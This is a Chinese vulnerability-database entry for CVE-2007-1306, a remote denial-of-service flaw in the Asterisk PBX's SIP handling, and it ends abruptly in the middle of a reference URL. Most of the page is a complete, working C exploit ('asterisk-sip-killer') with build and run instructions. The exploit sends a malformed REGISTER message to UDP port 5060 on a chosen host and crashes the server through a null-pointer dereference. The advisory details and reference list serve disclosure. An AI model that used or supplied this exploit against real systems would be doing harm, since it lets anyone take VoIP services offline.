Asterisk畸形SIP消息远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112356 漏洞类型 其他
发布时间 2007-03-04 更新时间 2007-08-28
CVE编号 CVE-2007-1306 CNNVD-ID CNNVD-200703-231
漏洞平台 Multiple CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/3407
https://www.securityfocus.com/bid/22838
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-231
|漏洞详情
Asterisk是一款PBX系统的软件,运行在Linux系统上,支持使用SIP、IAX、H323协议进行IP通话。Asterisk在处理畸形结构的报文时存在漏洞,远程攻击者可能利用此漏洞导致服务崩溃。如果攻击者向5060/UDP端口发送的SIP消息在请求行中没有包含URI和SIP版本的话,如REGISTER\r\n,则Asterisk在处理该消息时会触发空指针引用,导致拒绝服务。
|漏洞EXP
/*
this will cause asterisk to segfault,
the bug that this exploits has been patched in release 1.2.16  & 1.4.1

CLI>

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1082719152 (LWP 2510)]
register_verify (p=0x81cf600, sin=0x4088e750, req=0x4088e760, uri=0x0)
    at chan_sip.c:8257
8257            while (*t && *t > ' ' && *t != ';')
(gdb) 


build:
gcc -o asterisk-sip-killer asterisk-sip-killer.c

run:
./asterisk-sip-killer -h <targethost>

*/
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/tcp.h>

#define SIP_UDP_PORT 5060

struct udp_session {	
	int sd;
	struct sockaddr_in saddr;
};

int make_udp(struct udp_session *p, char *remotehost, int port)
{
	int sd;
	int ret;
	struct sockaddr_in saddr;
	struct hostent *he;

	sd = socket(AF_INET,SOCK_DGRAM,0);

	if (sd == -1) {
		printf("error making socket\n");
		return -1;
	}

	he = gethostbyname(remotehost);
	
	saddr.sin_family = AF_INET;
	saddr.sin_port = htons(port);
	saddr.sin_addr.s_addr = inet_addr(remotehost);
	memset(&(saddr.sin_zero), '\0', 8);
	p->sd = sd;
	memcpy(&p->saddr,&saddr,sizeof(struct sockaddr_in));

	printf("udp socket ready\n");
	
	return 0;
}

void kill_asterisk(struct udp_session *sess)
{
	int ret;
	char *p =
		"REGISTER              \r\n"
		"Via: SIP/2.0/UDP 192.168.204.130:5060;branch=z9hG4bK1d97e14f\r\n"
		"Max-Forwards: 70\r\n"
		"From: <sip:666@192.168.204.130>;tag=as253946cf\r\n"
		"To: <sip:100@192.168.204.130>\r\n"
		"Call-ID: 7e64a49e5cf018231228938050e43d3b@127.0.0.1\r\n"
		"CSeq: 104 REGISTER\r\n"
		"User-Agent: Asterisk PBX\r\n"
		"Expires: 120\r\n"
		"Contact: <sip:666@192.168.204.130>\r\n"
		"Event: registration\r\n"
		"Content-Length: 0\r\n";

	ret = sendto(sess->sd, p, strlen(p), 0,
	       (struct sockaddr *)&sess->saddr,
	       sizeof(struct sockaddr));

	if (ret) {	
		printf("You may have well shutdown a asterisk server\n");
	} else {
		printf("there was a issue sending the request\n");
		return;
	}
	return;
}
int main(int argc, char **argv)
{
	int i = 0;
	char *r_host = NULL;
	struct udp_session *connection_out;
	

	for (i=0;i<argc;i++) {
		if (!(strcmp(argv[i],"-h"))) {
                        printf("it looks like you want a host entry\n");
                        r_host = argv[i+1];
                        printf("r_host: %s\n", r_host);
                }
        }

	if (!r_host) {
		printf("umm you forgot the -h <host> option!\n");
		return 0;
	}

	if (!(connection_out = (struct udp_session *)malloc(sizeof(struct udp_session)))) {
		printf("malloc failed your computer sucks\n");
		return 0;
	}
	make_udp(connection_out, r_host, SIP_UDP_PORT);
	kill_asterisk(connection_out);	
	free(connection_out);
	return 0;
}

// milw0rm.com [2007-03-04]
|受影响的产品
SuSE Linux 10.1 Gentoo Linux EasyVoxBox EasyVoxBox 0.005 Debian Linux 3.1 sparc Debian Linux 3.1 s/390 Debian Linux 3.1 ppc Debian Linux 3.1 mipsel
|参考资料

来源:VU#228032
名称:VU#228032
链接:http://www.kb.cert.org/vuls/id/228032
来源:XF
名称:asterisk-sip-channeldriver-dos(32830)
链接:http://xforce.iss.net/xforce/xfdb/32830
来源:SECTRACK
名称:1017723
链接:http://www.securitytracker.com/id?1017723
来源:BID
名称:22838
链接:http://www.securityfocus.com/bid/22838
来源:VUPEN
名称:ADV-2007-0830
链接:http://www.frsirt.com/english/advisories/2007/0830
来源:GENTOO
名称:GLSA-200703-14
链接:http://security.gentoo.org/glsa/glsa-200703-14.xml
来源:SECUNIA
名称:24578
链接:http://secunia.com/advisories/24578
来源:SECUNIA
名称:24380
链接:http://secunia.com/advisories/24380
来源:MISC
链接:http://labs.musecurity.com/advisories/MU-200703-01.txt
来源:asterisk.org
链接:http://asterisk.org/node/48320
来源:asterisk.org
链接:http://asterisk.org/node/48319
来源:OSVDB
名称:33888
链接:http://www.osvdb.org/33888
来源:SUSE
名称:SUSE-SA:2007:034
链接:http://www.novell.com/linux/security/advisories/2007_34_asterisk.html
来源:DEBIAN
名称:DSA-1358
链接:http://www.debian.org/security/2007/dsa-1358
来源:SECUNIA
名称:25582
链接:http://secunia.com/advisorie